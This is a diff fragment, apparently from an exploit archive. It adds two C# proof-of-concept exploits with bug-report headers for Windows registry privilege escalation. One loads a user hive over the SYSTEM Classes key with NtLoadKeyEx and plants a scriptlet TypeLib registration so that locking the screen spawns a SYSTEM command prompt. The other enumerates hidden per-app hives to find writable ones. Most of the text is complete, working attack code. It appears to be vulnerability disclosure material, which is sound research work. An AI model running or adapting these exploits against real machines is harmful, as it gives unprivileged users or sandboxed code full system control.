not tested Windows 7 +Class: Elevation of Privilege + +Summary: +The NtLoadKeyEx system call allows an unprivileged user to load registry hives outside of the \Registry\A hidden attachment point which can be used to elevate privileges. + +Description: + +Windows Vista and above support loading per-user registry hives. Normally calling NtLoadKeyEx would require Backup/Restore privileges to do this making it useless for the average user.. However per-user hives are permitted from a normal user. When calling the Win32 API RegLoadAppKey the hive is loaded under \Registry\A which is a hidden attachment key and doesn’t provide any obvious benefit from an EoP perspective (especially as the root name is a random GUID). However it turns out that you can load the per-user hive to any attachment point such as \Registry\User or \Registry\Machine. Interestingly this works even as a sandboxed user, so it would be an escape out of EPM/Edge/Bits of Chrome etc. + +So how can we exploit this? The simplest way I’ve found is to register the hive as the local system "Classes" key. This isn’t registered by default, however a quick inspection indicates that local system does indeed refer to this key when trying to access COM registration information. So by putting an appropriate registration in \Registry\User\S-1-5-18_Classes it will be loaded as a local system component and privileged execution is achieved. + +Proof of Concept: + +I’ve provided a PoC as a C# source code file. You need to compile it first. It uses the issue with NtLoadKeyEx to map a custom hive over the local system’s Classes key. It then registers a type library which is loaded when WinLogon is signaled. I signal WinLogon by locking the screen. It abuses the fact that registered type library paths when passed to LoadTypeLib can be a COM moniker. So I register a COM scriptlet moniker which will be bound when LoadTypeLib parses it, this causes a local scriptlet file to be executed which respawns the original binary to spawn an interactive command prompt. By doing it this way it works on 32 bit and 64 bit without any changes. + +Note that it doesn’t need to use the Lock Screen, just this was the first technique I found. Many system services are loading data out of the registry hive, it would just be a case of finding something which could be trivially triggered by the application. In any case imo the bug is the behaviour of NtLoadKeyEx, not how I exploit it. + +1) Compile the C# source code file. +2) Execute the PoC executable as a normal user. +3) The PoC should lock the screen. You’ll need to unlock again (do not log out). +4) If successful a system level command prompt should be available on the user’s desktop when you unlock. + +Expected Result: +You can’t create a per-user hive outside of the hidden attachment point. + +Observed Result: +Well obviously you can. +*/ + +using Microsoft.Win32; +using Microsoft.Win32.SafeHandles; +using System; +using System.Diagnostics; +using System.IO; +using System.Reflection; +using System.Runtime.InteropServices; +using System.Text; +using System.Threading; + +namespace Poc_NtLoadKeyEx_EoP +{ + class Program + { + [Flags] + public enum AttributeFlags : uint + { + None = 0, + Inherit = 0x00000002, + Permanent = 0x00000010, + Exclusive = 0x00000020, + CaseInsensitive = 0x00000040, + OpenIf = 0x00000080, + OpenLink = 0x00000100, + KernelHandle = 0x00000200, + ForceAccessCheck = 0x00000400, + IgnoreImpersonatedDevicemap = 0x00000800, + DontReparse = 0x00001000, + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] + public sealed class UnicodeString + { + ushort Length; + ushort MaximumLength; + [MarshalAs(UnmanagedType.LPWStr)] + string Buffer; + + public UnicodeString(string str) + { + Length = (ushort)(str.Length * 2); + MaximumLength = (ushort)((str.Length * 2) + 1); + Buffer = str; + } + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] + public sealed class ObjectAttributes : IDisposable + { + int Length; + IntPtr RootDirectory; + IntPtr ObjectName; + AttributeFlags Attributes; + IntPtr SecurityDescriptor; + IntPtr SecurityQualityOfService; + + private static IntPtr AllocStruct(object s) + { + int size = Marshal.SizeOf(s); + IntPtr ret = Marshal.AllocHGlobal(size); + Marshal.StructureToPtr(s, ret, false); + return ret; + } + + private static void FreeStruct(ref IntPtr p, Type struct_type) + { + Marshal.DestroyStructure(p, struct_type); + Marshal.FreeHGlobal(p); + p = IntPtr.Zero; + } + + public ObjectAttributes(string object_name) + { + Length = Marshal.SizeOf(this); + if (object_name != null) + { + ObjectName = AllocStruct(new UnicodeString(object_name)); + } + Attributes = AttributeFlags.None; + } + + public void Dispose() + { + if (ObjectName != IntPtr.Zero) + { + FreeStruct(ref ObjectName, typeof(UnicodeString)); + } + GC.SuppressFinalize(this); + } + + ~ObjectAttributes() + { + Dispose(); + } + } + + [Flags] + public enum LoadKeyFlags + { + None = 0, + AppKey = 0x10, + Exclusive = 0x20, + Unknown800 = 0x800, + } + + [Flags] + public enum GenericAccessRights : uint + { + None = 0, + GenericRead = 0x80000000, + GenericWrite = 0x40000000, + GenericExecute = 0x20000000, + GenericAll = 0x10000000, + Delete = 0x00010000, + ReadControl = 0x00020000, + WriteDac = 0x00040000, + WriteOwner = 0x00080000, + Synchronize = 0x00100000, + MaximumAllowed = 0x02000000, + } + + public class NtException : ExternalException + { + [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)] + private static extern IntPtr GetModuleHandle(string modulename); + + [Flags] + enum FormatFlags + { + AllocateBuffer = 0x00000100, + FromHModule = 0x00000800, + FromSystem = 0x00001000, + IgnoreInserts = 0x00000200 + } + + [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)] + private static extern int FormatMessage( + FormatFlags dwFlags, + IntPtr lpSource, + int dwMessageId, + int dwLanguageId, + out IntPtr lpBuffer, + int nSize, + IntPtr Arguments + ); + + [DllImport("kernel32.dll")] + private static extern IntPtr LocalFree(IntPtr p); + + private static string StatusToString(int status) + { + IntPtr buffer = IntPtr.Zero; + try + { + if (FormatMessage(FormatFlags.AllocateBuffer | FormatFlags.FromHModule | FormatFlags.FromSystem | FormatFlags.IgnoreInserts, + GetModuleHandle("ntdll.dll"), status, 0, out buffer, 0, IntPtr.Zero) > 0) + { + return Marshal.PtrToStringUni(buffer); + } + } + finally + { + if (buffer != IntPtr.Zero) + { + LocalFree(buffer); + } + } + return String.Format("Unknown Error: 0x{0:X08}", status); + } + + public NtException(int status) : base(StatusToString(status)) + { + } + } + + public static void StatusToNtException(int status) + { + if (status < 0) + { + throw new NtException(status); + } + } + + [DllImport("ntdll.dll")] + public static extern int NtLoadKeyEx(ObjectAttributes DestinationName, ObjectAttributes FileName, LoadKeyFlags Flags, + IntPtr TrustKeyHandle, IntPtr EventHandle, GenericAccessRights DesiredAccess, out SafeRegistryHandle KeyHandle, int Unused); + + static string scriptlet_code = @" + + + + + + + + +"; + + public enum TokenInformationClass + { + TokenSessionId = 12 + } + + [DllImport("ntdll.dll")] + public static extern int NtClose(IntPtr handle); + + [DllImport("ntdll.dll", CharSet = CharSet.Unicode)] + public static extern int NtOpenProcessTokenEx( + IntPtr ProcessHandle, + GenericAccessRights DesiredAccess, + AttributeFlags HandleAttributes, + out IntPtr TokenHandle); + + public sealed class SafeKernelObjectHandle + : SafeHandleZeroOrMinusOneIsInvalid + { + public SafeKernelObjectHandle() + : base(true) + { + } + + public SafeKernelObjectHandle(IntPtr handle, bool owns_handle) + : base(owns_handle) + { + SetHandle(handle); + } + + protected override bool ReleaseHandle() + { + if (!IsInvalid) + { + NtClose(this.handle); + this.handle = IntPtr.Zero; + return true; + } + return false; + } + } + + public enum TokenType + { + Primary = 1, + Impersonation = 2 + } + + [DllImport("ntdll.dll", CharSet = CharSet.Unicode)] + public static extern int NtDuplicateToken( + IntPtr ExistingTokenHandle, + GenericAccessRights DesiredAccess, + ObjectAttributes ObjectAttributes, + bool EffectiveOnly, + TokenType TokenType, + out IntPtr NewTokenHandle + ); + + public static SafeKernelObjectHandle DuplicateToken(SafeKernelObjectHandle existing_token) + { + IntPtr new_token; + + using (ObjectAttributes obja = new ObjectAttributes(null)) + { + StatusToNtException(NtDuplicateToken(existing_token.DangerousGetHandle(), + GenericAccessRights.MaximumAllowed, obja, false, TokenType.Primary, out new_token)); + return new SafeKernelObjectHandle(new_token, true); + } + } + + public static SafeKernelObjectHandle OpenProcessToken() + { + IntPtr new_token; + StatusToNtException(NtOpenProcessTokenEx(new IntPtr(-1), + GenericAccessRights.MaximumAllowed, AttributeFlags.None, out new_token)); + using (SafeKernelObjectHandle ret = new SafeKernelObjectHandle(new_token, true)) + { + return DuplicateToken(ret); + } + } + + [DllImport("ntdll.dll")] + public static extern int NtSetInformationToken( + SafeKernelObjectHandle TokenHandle, + TokenInformationClass TokenInformationClass, + byte[] TokenInformation, + int TokenInformationLength); + + public static void SetTokenSessionId(SafeKernelObjectHandle token, int session_id) + { + byte[] buffer = BitConverter.GetBytes(session_id); + NtSetInformationToken(token, TokenInformationClass.TokenSessionId, + buffer, buffer.Length); + } + + static Tuple GetEvents() + { + EventWaitHandle user_ev = new EventWaitHandle(false, EventResetMode.AutoReset, @"Global\ntloadkey_event_user_wait"); + EventWaitHandle sys_ev = new EventWaitHandle(false, EventResetMode.AutoReset, @"Global\ntloadkey_event_sys_wait"); + + return new Tuple(user_ev, sys_ev); + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] + struct STARTUPINFO + { + public Int32 cb; + public string lpReserved; + public string lpDesktop; + public string lpTitle; + public Int32 dwX; + public Int32 dwY; + public Int32 dwXSize; + public Int32 dwYSize; + public Int32 dwXCountChars; + public Int32 dwYCountChars; + public Int32 dwFillAttribute; + public Int32 dwFlags; + public Int16 wShowWindow; + public Int16 cbReserved2; + public IntPtr lpReserved2; + public IntPtr hStdInput; + public IntPtr hStdOutput; + public IntPtr hStdError; + } + + [StructLayout(LayoutKind.Sequential)] + internal struct PROCESS_INFORMATION + { + public IntPtr hProcess; + public IntPtr hThread; + public int dwProcessId; + public int dwThreadId; + } + + enum CreateProcessFlags + { + CREATE_BREAKAWAY_FROM_JOB = 0x01000000, + CREATE_DEFAULT_ERROR_MODE = 0x04000000, + CREATE_NEW_CONSOLE = 0x00000010, + CREATE_NEW_PROCESS_GROUP = 0x00000200, + CREATE_NO_WINDOW = 0x08000000, + CREATE_PROTECTED_PROCESS = 0x00040000, + CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000, + CREATE_SEPARATE_WOW_VDM = 0x00000800, + CREATE_SHARED_WOW_VDM = 0x00001000, + CREATE_SUSPENDED = 0x00000004, + CREATE_UNICODE_ENVIRONMENT = 0x00000400, + DEBUG_ONLY_THIS_PROCESS = 0x00000002, + DEBUG_PROCESS = 0x00000001, + DETACHED_PROCESS = 0x00000008, + EXTENDED_STARTUPINFO_PRESENT = 0x00080000, + INHERIT_PARENT_AFFINITY = 0x00010000 + } + + [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)] + static extern bool CreateProcessAsUser( + IntPtr hToken, + string lpApplicationName, + string lpCommandLine, + IntPtr lpProcessAttributes, + IntPtr lpThreadAttributes, + bool bInheritHandles, + CreateProcessFlags dwCreationFlags, + IntPtr lpEnvironment, + string lpCurrentDirectory, + ref STARTUPINFO lpStartupInfo, + out PROCESS_INFORMATION lpProcessInformation); + + static void SpawnInteractiveCmd(int sessionid) + { + Tuple events = GetEvents(); + Console.WriteLine("Got Events"); + events.Item1.Set(); + events.Item2.WaitOne(); + SafeKernelObjectHandle token = OpenProcessToken(); + SetTokenSessionId(token, sessionid); + + STARTUPINFO startInfo = new STARTUPINFO(); + startInfo.cb = Marshal.SizeOf(startInfo); + PROCESS_INFORMATION procInfo; + + CreateProcessAsUser(token.DangerousGetHandle(), null, "cmd.exe", + IntPtr.Zero, IntPtr.Zero, false, CreateProcessFlags.CREATE_NEW_CONSOLE, IntPtr.Zero, null, ref startInfo, out procInfo); + } + + [DllImport("user32.dll")] + static extern bool LockWorkStation(); + + static void DoExploit() + { + Console.WriteLine("{0}", Assembly.GetCallingAssembly().Location); + Tuple events = GetEvents(); + + string cmdline = String.Format(@"""{0}"" {1}", + Assembly.GetCallingAssembly().Location.Replace('\\', '/'), Process.GetCurrentProcess().SessionId); + string scriptlet_path = Path.GetFullPath("dummy.sct"); + File.WriteAllText(scriptlet_path, scriptlet_code.Replace("%CMDLINE%", cmdline), Encoding.ASCII); + Console.WriteLine("{0}", scriptlet_path); + string scriptlet_url = "script:" + new Uri(scriptlet_path).AbsoluteUri; + Console.WriteLine("{0}", scriptlet_url); + string reg_name = @"\Registry\User\S-1-5-18_Classes"; + string path = @"\??\" + Path.GetFullPath("dummy.hiv"); + File.Delete("dummy.hiv"); + ObjectAttributes KeyName = new ObjectAttributes(reg_name); + ObjectAttributes FileName = new ObjectAttributes(path); + SafeRegistryHandle keyHandle; + + StatusToNtException(NtLoadKeyEx(KeyName, + FileName, LoadKeyFlags.AppKey, IntPtr.Zero, + IntPtr.Zero, GenericAccessRights.GenericAll, out keyHandle, 0)); + + RegistryKey key = RegistryKey.FromHandle(keyHandle); + RegistryKey typelib_key = key.CreateSubKey("TypeLib").CreateSubKey("{D597DEED-5B9F-11D1-8DD2-00AA004ABD5E}").CreateSubKey("2.0").CreateSubKey("0"); + typelib_key.CreateSubKey("win32").SetValue(null, scriptlet_url); + typelib_key.CreateSubKey("win64").SetValue(null, scriptlet_url); + + Console.WriteLine("Handle: {0} - Key {1} - Path {2}", keyHandle.DangerousGetHandle(), reg_name, path); + Console.WriteLine("Lock screen and re-login."); + LockWorkStation(); + events.Item1.WaitOne(); + typelib_key.DeleteSubKey("win32"); + typelib_key.DeleteSubKey("win64"); + File.Delete(scriptlet_path); + typelib_key.Close(); + key.Close(); + events.Item2.Set(); + } + + static void Main(string[] args) + { + try + { + if (args.Length > 0) + { + SpawnInteractiveCmd(int.Parse(args[0])); + } + else + { + DoExploit(); + } + } + catch (Exception ex) + { + Console.WriteLine(ex.Message); + } + } + } +} \ No newline at end of file diff --git a/platforms/windows/local/40430.cs b/platforms/windows/local/40430.cs new file mode 100755 index 000000000..067809fb7 --- /dev/null +++ b/platforms/windows/local/40430.cs @@ -0,0 +1,286 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=870 + +Windows: RegLoadAppKey Hive Enumeration EoP +Platform: Windows 10 10586 not tested 8.1 Update 2 or Windows 7 +Class: Elevation of Privilege + +Summary: +RegLoadAppKey is documented to load keys in a location which can’t be enumerated and also non-guessable. However it’s possible to enumerate loaded hives and find ones which can be written to which might lead to EoP. + +Description: + +The RegLoadAppKey API loads a user specified hive without requiring administrator privileges. This is used to provide per-application registry hives and is used extensively by Immersive Applications but also some system services. The MSDN documentation states that the keys cannot be enumerated, the only way to get access to the same hive is by opening the file again using RegLoadAppKey which requires having suitable permissions on the target hive file. It also ensures that you can’t guess the loaded key name by generating a random GUID which is going to be pretty difficult to brute-force. + +This in part seems to be true if you try and open directly the attachment point of ‘\Registry\A’. That fails with access denied (I’ve not looked into the kernel to work out what actually does this check). However there’s no protection from recursive enumeration, so we can open ‘\Registry’ for read access, then open ‘A’ relative to that key. With this we can now enumerate all the loaded per-app hives. + +What we can do with this is less clear cut as it depends on what is using application hives at the current point in time. Immersive applications use per-app hives for their activation data and settings. While the activation hive seems to be correctly locked to only the user, the settings are not. As the default DACL for the settings hive is granting Everyone and ALL_APPLICATION_PACKAGES full access this means an Immersive Application could read/write settings data from any other running application. This even works between users on the same machine, so for example on a Terminal Server one user could read the settings of another user’s running Immersive Applications. At the least this is an information disclosure issue, but it might Edge content processes to access the settings of the main Edge process (which runs under a different package SID). + +A few system services also use per-app hives, including the Background Tasks Infrastructure Service and Program Compatibility Assistant. The tasks hive is locked for write access to normal user’s although it can be read, while the PCA hive is fully writable by any user on the system (the hives file isn’t even readable by a normal user, let alone writable). I’ve not investigated if it’s possible to abuse this access to elevate privileges, but it certainly seems a possibility. There might be other vulnerable services which could be exploited, however I’ve not investigated much further on this. + +In the end it’s clear that there’s an assumption being made that as these hives shouldn’t be enumerable then that’s enough security to prevent abuse. This is especially true with the settings hives for immersive applications, the file DACL is locked to the package SID however the hive itself is allowed for all access to any package and relies on the fact that an application couldn’t open a new handle to it as the security boundary. + +Proof of Concept: + +I’ve provided a PoC as a C# source code file. You need to compile it first. + +1) Compile the C# source code file. +2) Execute the PoC executable as a normal user. +3) The PoC should print that it’s found some registry hives which it shouldn’t be able to enumerate. +4) It should also say it’s found the PCA hive as well. + +Expected Result: +You can’t enumerate per-app registry hives. + +Observed Result: +The hives can be enumerated and also some of them can be written to. +*/ + +using Microsoft.Win32; +using Microsoft.Win32.SafeHandles; +using System; +using System.Runtime.InteropServices; + +namespace Poc_RegLoadAppKey_EoP +{ + class Program + { + [Flags] + enum AttributeFlags : uint + { + None = 0, + Inherit = 0x00000002, + Permanent = 0x00000010, + Exclusive = 0x00000020, + CaseInsensitive = 0x00000040, + OpenIf = 0x00000080, + OpenLink = 0x00000100, + KernelHandle = 0x00000200, + ForceAccessCheck = 0x00000400, + IgnoreImpersonatedDevicemap = 0x00000800, + DontReparse = 0x00001000, + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] + sealed class UnicodeString + { + ushort Length; + ushort MaximumLength; + [MarshalAs(UnmanagedType.LPWStr)] + string Buffer; + + public UnicodeString(string str) + { + Length = (ushort)(str.Length * 2); + MaximumLength = (ushort)((str.Length * 2) + 1); + Buffer = str; + } + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] + sealed class ObjectAttributes : IDisposable + { + int Length; + IntPtr RootDirectory; + IntPtr ObjectName; + AttributeFlags Attributes; + IntPtr SecurityDescriptor; + IntPtr SecurityQualityOfService; + + private static IntPtr AllocStruct(object s) + { + int size = Marshal.SizeOf(s); + IntPtr ret = Marshal.AllocHGlobal(size); + Marshal.StructureToPtr(s, ret, false); + return ret; + } + + private static void FreeStruct(ref IntPtr p, Type struct_type) + { + Marshal.DestroyStructure(p, struct_type); + Marshal.FreeHGlobal(p); + p = IntPtr.Zero; + } + + public ObjectAttributes(string object_name, AttributeFlags flags, IntPtr root) + { + Length = Marshal.SizeOf(this); + if (object_name != null) + { + ObjectName = AllocStruct(new UnicodeString(object_name)); + } + Attributes = flags; + RootDirectory = root; + } + + public void Dispose() + { + if (ObjectName != IntPtr.Zero) + { + FreeStruct(ref ObjectName, typeof(UnicodeString)); + } + GC.SuppressFinalize(this); + } + + ~ObjectAttributes() + { + Dispose(); + } + } + + [Flags] + enum GenericAccessRights : uint + { + None = 0, + GenericRead = 0x80000000, + GenericWrite = 0x40000000, + GenericExecute = 0x20000000, + GenericAll = 0x10000000, + Delete = 0x00010000, + ReadControl = 0x00020000, + WriteDac = 0x00040000, + WriteOwner = 0x00080000, + Synchronize = 0x00100000, + MaximumAllowed = 0x02000000, + } + + class NtException : ExternalException + { + [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)] + private static extern IntPtr GetModuleHandle(string modulename); + + [Flags] + enum FormatFlags + { + AllocateBuffer = 0x00000100, + FromHModule = 0x00000800, + FromSystem = 0x00001000, + IgnoreInserts = 0x00000200 + } + + [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)] + private static extern int FormatMessage( + FormatFlags dwFlags, + IntPtr lpSource, + int dwMessageId, + int dwLanguageId, + out IntPtr lpBuffer, + int nSize, + IntPtr Arguments + ); + + [DllImport("kernel32.dll")] + private static extern IntPtr LocalFree(IntPtr p); + + private static string StatusToString(int status) + { + IntPtr buffer = IntPtr.Zero; + try + { + if (FormatMessage(FormatFlags.AllocateBuffer | FormatFlags.FromHModule | FormatFlags.FromSystem | FormatFlags.IgnoreInserts, + GetModuleHandle("ntdll.dll"), status, 0, out buffer, 0, IntPtr.Zero) > 0) + { + return Marshal.PtrToStringUni(buffer); + } + } + finally + { + if (buffer != IntPtr.Zero) + { + LocalFree(buffer); + } + } + return String.Format("Unknown Error: 0x{0:X08}", status); + } + + public NtException(int status) : base(StatusToString(status)) + { + } + } + + static void StatusToNtException(int status) + { + if (status < 0) + { + throw new NtException(status); + } + } + + [DllImport("ntdll.dll")] + static extern int NtOpenKeyEx( + out SafeRegistryHandle KeyHandle, + GenericAccessRights DesiredAccess, + [In] ObjectAttributes ObjectAttributes, + int OpenOptions + ); + + [DllImport("ntdll.dll")] + static extern int NtClose(IntPtr handle); + + static RegistryKey OpenKey(RegistryKey base_key, string path, bool writable = false, bool throw_on_error = true) + { + IntPtr root_key = base_key != null ? base_key.Handle.DangerousGetHandle() : IntPtr.Zero; + using (ObjectAttributes KeyName = new ObjectAttributes(path, AttributeFlags.CaseInsensitive | AttributeFlags.OpenLink, root_key)) + { + SafeRegistryHandle keyHandle; + GenericAccessRights desired_access = GenericAccessRights.GenericRead; + if (writable) + { + desired_access |= GenericAccessRights.GenericWrite; + } + + int status = NtOpenKeyEx(out keyHandle, desired_access, KeyName, 0); + if (throw_on_error) + { + StatusToNtException(status); + } + + if (status == 0) + return RegistryKey.FromHandle(keyHandle); + + return null; + } + } + + static void DoExploit() + { + RegistryKey root_key = OpenKey(null, @"\Registry"); + RegistryKey attach_key = root_key.OpenSubKey("A"); + + foreach (string key_name in attach_key.GetSubKeyNames()) + { + bool writable = true; + RegistryKey app_key = OpenKey(attach_key, key_name, true, false); + if (app_key == null) + { + writable = false; + app_key = OpenKey(attach_key, key_name, false, false); + } + + if (app_key != null) + { + Console.WriteLine(@"Found {0} Key \Registry\A\{1}", writable ? "Writable" : "Readable", key_name); + RegistryKey sub_key = app_key.OpenSubKey(@"Root\Programs"); + if (sub_key != null) + { + Console.WriteLine("{0} is the PCA Cache Hive", key_name); + sub_key.Close(); + } + app_key.Close(); + } + } + } + + static void Main(string[] args) + { + try + { + DoExploit(); + } + catch (Exception ex) + { + Console.WriteLine(ex.Message); + } + } + } +} \ No newline at end of file